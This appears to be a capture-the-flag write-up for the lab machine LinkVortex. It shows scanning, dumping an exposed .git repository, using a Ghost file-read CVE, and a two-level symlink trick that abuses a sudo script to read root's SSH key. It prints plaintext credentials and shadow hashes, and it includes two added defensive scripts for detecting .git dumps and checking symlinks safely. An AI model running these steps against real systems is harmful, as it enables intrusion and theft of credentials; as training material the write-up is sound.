Basic information

Port scan

Ports 22 and 80:

```
$ nmap -sC -sV -Pn 10.10.11.47
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-10 13:09 CST
Nmap scan report for 10.10.11.47
Host is up (0.077s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_ 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://linkvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.83 seconds
```

80

A hosts entry is needed:

```
10.10.11.47 linkvortex.htb
```

A hardware-related corporate site; the footer in the bottom right corner shows it runs on Ghost:

Subdomain scan

Subdomain scanning finds dev:

```
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://linkvortex.htb/" -H 'Host: FUZZ.linkvortex.htb' -fs 230

dev [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 82ms]
```

dev

Visiting it shows the site is not open yet:

Directory scan

Directory scanning of dev reveals a leaked .git directory; on the main site it finds the Ghost login:

```
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://dev.linkvortex.htb/

/.git (Status: 301) [Size: 239] [--> http://dev.linkvortex.htb/.git/]
/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.git/logs/ (Status: 200) [Size: 868]
/.git/HEAD (Status: 200) [Size: 41]
/.htpasswd (Status: 403) [Size: 199]
/.git/config (Status: 200) [Size: 201]
/.git/index (Status: 200) [Size: 707577]
/cgi-bin/ (Status: 403) [Size: 199]
/index.html (Status: 200) [Size: 2538]
/server-status (Status: 403) [Size: 199]

# scan option -r: follow redirects
ffuf -w ~/Tools/dict/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u "http://linkvortex.htb/FUZZ" -r

ghost [Status: 200, Size: 3787, Words: 340, Lines: 65, Duration: 501ms]
```

git to ghost

So it is the usual routine of dumping the repository:

```bash
git-dumper http://dev.linkvortex.htb/.git/ dev_git
```
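From the defender's side, the 200 responses for `/.git/HEAD`, `/.git/config` and `/.git/index` in the scan output above are the signature that matters: a repository dump is a burst of such requests from one client, and any 2xx answer means the deny rule for `.git` is missing or not matching. The script below is an added example, not part of the original writeup or of any tool it uses; it tallies `/.git` requests per client from a few Apache combined-log lines and reports whether repository data was actually served. The log lines, addresses, sizes and user agents are constructed for the example.

```bash
#!/usr/bin/env bash
# Added example: detect a .git exposure (and a dump in progress) from
# Apache combined-format access-log lines.
# The sample below is constructed for this example; only the request
# paths mirror what a directory scan or repository dumper asks for first.
SAMPLE_LOG='10.10.14.5 - - [10/Dec/2024:13:20:01 +0800] "GET /.git/HEAD HTTP/1.1" 200 41 "-" "curl/8.5.0"
10.10.14.5 - - [10/Dec/2024:13:20:01 +0800] "GET /.git/config HTTP/1.1" 200 201 "-" "curl/8.5.0"
10.10.14.5 - - [10/Dec/2024:13:20:02 +0800] "GET /.git/index HTTP/1.1" 200 707577 "-" "curl/8.5.0"
10.10.14.9 - - [10/Dec/2024:13:21:10 +0800] "GET /index.html HTTP/1.1" 200 2538 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Dec/2024:13:21:11 +0800] "GET /.git/objects/ab/cdef HTTP/1.1" 404 199 "-" "curl/8.5.0"
10.10.14.7 - - [10/Dec/2024:13:22:00 +0800] "GET /.git/HEAD HTTP/1.1" 403 199 "-" "Mozilla/5.0"'

# git_requests_by_client LOGTEXT
# Prints one line "ip served denied" per client that touched a /.git path:
#   served = 2xx responses (repository data actually left the server)
#   denied = 4xx responses (blocked by the web server, or object missing)
# Combined-log field layout: $1 client, $7 request path, $9 status code.
git_requests_by_client() {
    printf '%s\n' "$1" | awk '
        $7 ~ /^\/\.git(\/|$)/ {
            seen[$1] = 1
            if ($9 ~ /^2/) served[$1]++
            else if ($9 ~ /^4/) denied[$1]++
        }
        END {
            for (ip in seen)
                printf "%s %d %d\n", ip, served[ip] + 0, denied[ip] + 0
        }' | sort
}

# git_exposed LOGTEXT
# Prints "exposed" and returns 0 when any /.git path was served with a 2xx,
# i.e. the deny rule is absent or not matching; prints "blocked" and
# returns 1 otherwise.
git_exposed() {
    local served
    served=$(git_requests_by_client "$1" | awk '{ s += $2 } END { print s + 0 }')
    if [ "$served" -gt 0 ]; then
        echo "exposed"
        return 0
    fi
    echo "blocked"
    return 1
}

# Stand-alone run: per-client tally, then the verdict for the sample.
git_requests_by_client "$SAMPLE_LOG"
git_exposed "$SAMPLE_LOG"
```

Feed the functions the relevant slice of the real log (`tail -n 10000 access.log`, for instance) instead of `SAMPLE_LOG`; a non-zero `served` count for any client is the finding, while a client with only `denied` hits shows the deny rule working as intended.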

Searching the dump for passwords directly yields the Ghost login:

```
admin@linkvortex.htb
OctopiFociPilfer45
```

CVE-2023-40028

The version shown in the admin panel is Ghost 5.58.0, and a search turns up a matching vulnerability:

It is an arbitrary file read. The files recovered from git earlier show that Ghost runs in Docker, and the path of the configuration file is visible:

So read the configuration file and obtain bob's password:

```json
"auth": {
"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"
}
```

user flag

Log in over SSH with bob's credentials:

Privilege escalation enumeration

A script can be run with sudo, and sudo preserves the CHECK_CONTENT environment variable. The script checks the target file of a symlink and, once the check passes, moves the link to a designated directory; if CHECK_CONTENT is set, it calls cat to display the contents:

The check for sensitive files is performed only once, however, so the file can be read through two layers of symlinks.

Privilege escalation & root flag

So read the root private key through two layers of symlinks and log in:

```bash
# run from /tmp/miao, the directory the second link points into
ln -s /root/.ssh/id_rsa 2.png
ln -s /tmp/miao/2.png 1.png
CHECK_CONTENT=true sudo /usr/bin/bash /opt/ghost/clean_symlink.sh 1.png
```
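The root cause of the bypass is that the script judges the first hop of the link rather than where the chain ends. As an added example (not the box's /opt/ghost/clean_symlink.sh, whose exact contents the writeup does not show), here is a bash version that resolves the whole chain with `readlink -f` before deciding and, when CHECK_CONTENT is set, reads only the target it has approved. The weak single-hop check is kept alongside for contrast. Protected prefixes and the quarantine directory are parameters so the demo can rebuild the `1.png -> 2.png -> key` chain inside a temporary directory; those paths and the secret file are constructed.

```bash
#!/usr/bin/env bash
# Added example: symlink cleanup that checks the fully resolved target,
# next to the weak one-hop pattern that a two-level chain walks past.

# single_hop_target LINK -> prints only the next hop (what a single readlink sees)
single_hop_target() {
    readlink -- "$1"
}

# final_target LINK -> prints the fully resolved path, every hop followed
final_target() {
    readlink -f -- "$1"
}

# is_protected PATH PREFIX... -> 0 if PATH equals a prefix or lies beneath it
is_protected() {
    local path="$1"; shift
    local p resolved
    for p in "$@"; do
        # normalise the prefix too (e.g. /tmp may itself be a symlink)
        resolved=$(readlink -f -- "$p" 2>/dev/null || printf '%s' "$p")
        case "$path" in
            "$resolved"|"$resolved"/*) return 0 ;;
        esac
    done
    return 1
}

# weak_check LINK PREFIX...   -> "allowed"/"denied", judging the first hop only
weak_check() {
    local link="$1"; shift
    if is_protected "$(single_hop_target "$link")" "$@"; then echo denied; else echo allowed; fi
}

# strong_check LINK PREFIX... -> "allowed"/"denied", judging the final target
strong_check() {
    local link="$1"; shift
    if is_protected "$(final_target "$link")" "$@"; then echo denied; else echo allowed; fi
}

# clean_symlink LINK QUARANTINE_DIR PREFIX...
# Moves LINK into QUARANTINE_DIR only when the final target is outside every
# protected prefix. With CHECK_CONTENT set, it cats the resolved target it
# approved, never the link name. Dangling or protected links return 1.
clean_symlink() {
    local link="$1" quarantine="$2"; shift 2
    local target
    target=$(final_target "$link")
    if [ -z "$target" ]; then
        echo "cannot resolve: $link" >&2
        return 1
    fi
    if is_protected "$target" "$@"; then
        echo "refusing: $link resolves to protected $target" >&2
        return 1
    fi
    mv -- "$link" "$quarantine/"
    if [ -n "${CHECK_CONTENT:-}" ]; then
        cat -- "$target"
    fi
}

# demo_two_hop: rebuilds the 1.png -> 2.png -> secret chain under a temp
# directory (constructed paths) and prints "weak=... strong=...".
demo_two_hop() {
    local base; base=$(mktemp -d)
    mkdir -p "$base/root/.ssh" "$base/work" "$base/quarantine"
    printf 'constructed secret\n' > "$base/root/.ssh/id_rsa"
    ln -s "$base/root/.ssh/id_rsa" "$base/work/2.png"
    ln -s "$base/work/2.png" "$base/work/1.png"
    printf 'weak=%s strong=%s\n' \
        "$(weak_check "$base/work/1.png" "$base/root")" \
        "$(strong_check "$base/work/1.png" "$base/root")"
    rm -rf -- "$base"
}

demo_two_hop   # prints: weak=allowed strong=denied
```

The one-hop check sees `2.png`, an unremarkable path, and lets the link through; the resolved check sees the key file and refuses. Because sudo passes CHECK_CONTENT through, the caller decides whether content is printed, which is exactly why the decision about *what* may be printed has to rest on the resolved target.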

shadow

```
root:$y$j9T$C3zg87gHwrCXO0vl4igIh/$iisf9sVwilKAi7mI5p1FqQslJWM9t2.YUWznIPC/XIA:19814:0:99999:7:::
bob:$6$rounds=656000$4p3mw8hAd9ir.25f$ocGm9nW1TM2AB8Z.l0K.hi43bOrm3oxQsaKFACMoS2UL.tIXxSW3u/xsClrvkEhP5s.GUpdIvCX3qRtppDV8r.:19814:0:99999:7:::
```

References